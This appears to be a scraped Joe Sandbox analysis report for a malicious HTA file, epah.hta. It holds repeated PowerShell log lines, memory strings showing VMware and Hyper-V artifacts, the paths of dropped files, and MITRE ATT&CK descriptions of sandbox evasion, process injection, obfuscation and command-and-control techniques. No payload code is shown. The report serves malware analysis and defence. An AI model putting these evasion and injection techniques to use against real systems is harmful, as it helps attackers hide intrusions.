Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4592			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4672			Jump to behavior

Source: mshta.exe, 00000000.00000003.1677264706.0000000003309000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6)
Source: powershell.exe, 00000001.00000002.1674324075.0000000007A80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: mshta.exe, 00000000.00000003.1685416135.0000000003326000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.1674324075.0000000007A80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\;.
Source: powershell.exe, 00000001.00000002.1674634796.0000000007B11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report epah.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_450niw1h.chz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysfaqfb2.ojm.psm1

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: mshta.exePID: 6764, Parent PID: 2032

General

Windows Analysis Report
epah.hta